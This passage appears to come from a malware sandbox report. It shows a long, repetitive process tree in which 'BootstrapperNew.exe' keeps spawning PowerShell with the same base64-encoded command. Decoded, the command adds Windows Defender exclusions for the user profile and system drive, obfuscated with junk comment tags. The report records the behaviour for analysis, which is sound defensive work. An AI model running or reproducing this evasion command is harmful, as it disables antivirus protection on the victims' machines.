        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        134⤵
        
        PID:7560
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        134⤵
        Drops file in Windows directory
        
        PID:2820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        135⤵
        
        PID:4748
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        135⤵
        
        PID:864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        136⤵
        
        PID:6596
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        136⤵
        
        PID:6188
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        137⤵
        
        PID:6632
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        137⤵
        
        PID:6700
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        138⤵
        
        PID:6812
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        138⤵
        
        PID:6244
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        139⤵
        
        PID:8124
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        139⤵
        
        PID:5660
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        140⤵
        
        PID:376
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        140⤵
        
        PID:4596
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        141⤵
        
        PID:4640
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        141⤵
        Drops file in Windows directory
        
        PID:7156
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        142⤵
        
        PID:5432
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        142⤵
        
        PID:1468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        143⤵
        
        PID:5844
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        143⤵
        System Location Discovery: System Language Discovery
        
        PID:6980
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        144⤵
        
        PID:1768
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        144⤵
        
        PID:7112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        145⤵
        
        PID:7652
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        145⤵
        Drops file in Windows directory
        
        PID:2404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        146⤵
        
        PID:8112
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        146⤵
        
        PID:7348
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        147⤵
        
        PID:2892
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        147⤵
        Drops file in Windows directory
        
        PID:1412
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        148⤵
        
        PID:404
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        148⤵
        
        PID:2412
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        149⤵
        
        PID:6720
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        149⤵
        
        PID:4356
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        150⤵
        
        PID:7124
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        150⤵
        
        PID:3824
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        151⤵
        
        PID:8008
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        151⤵
        
        PID:6208
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        152⤵
        
        PID:5848
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        152⤵
        Checks computer location settings
        
        PID:5924
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        153⤵
        
        PID:6948
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        153⤵
        
        PID:7324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        154⤵
        
        PID:5952
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        154⤵
        Checks computer location settings
        
        PID:5164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        155⤵
        
        PID:5744
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        155⤵
        Checks computer location settings
        Drops file in Windows directory
        
        PID:4384
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        156⤵
        
        PID:7112
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        156⤵
        
        PID:7752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        157⤵
        
        PID:5260
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        157⤵
        Drops file in Windows directory
        
        PID:5068
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        158⤵
        
        PID:7412
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        158⤵
        Checks computer location settings
        
        PID:4672
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        159⤵
        
        PID:7300
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        159⤵
        
        PID:5012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        160⤵
        
        PID:5296
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        161⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3780
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        160⤵
        
        PID:7744
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        161⤵
        
        PID:7800
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        161⤵
        
        PID:2248
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        162⤵
        
        PID:5900
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        162⤵
        Drops file in Windows directory
        
        PID:5832
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        163⤵
        
        PID:6576
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        163⤵
        
        PID:7416
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        164⤵
        
        PID:5168
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        164⤵
        
        PID:2332
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        165⤵
        
        PID:6780
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        165⤵
        
        PID:6812
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
